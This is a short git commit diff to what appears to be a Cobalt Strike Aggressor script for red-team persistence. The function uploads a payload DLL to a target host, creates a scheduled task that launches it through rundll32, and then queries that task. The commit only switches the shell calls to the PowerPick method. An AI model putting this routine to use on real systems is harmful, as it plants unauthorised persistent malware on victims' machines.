Updated with PowerPick

Execute-Assembly
Harley Lebeau 2018-02-09 12:46:57 -07:00 committed by GitHub
parent efaaaaf6bd
commit fa91c50aa3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -14,8 +14,8 @@ sub persistUserSchtasks {
else { else {
bcd($bid, $3['targetpath']); bcd($bid, $3['targetpath']);
bupload($bid, $3['payloadfile']); bupload($bid, $3['payloadfile']);
bshell($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"'); bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
bshell($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list'); bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
} }
})); }));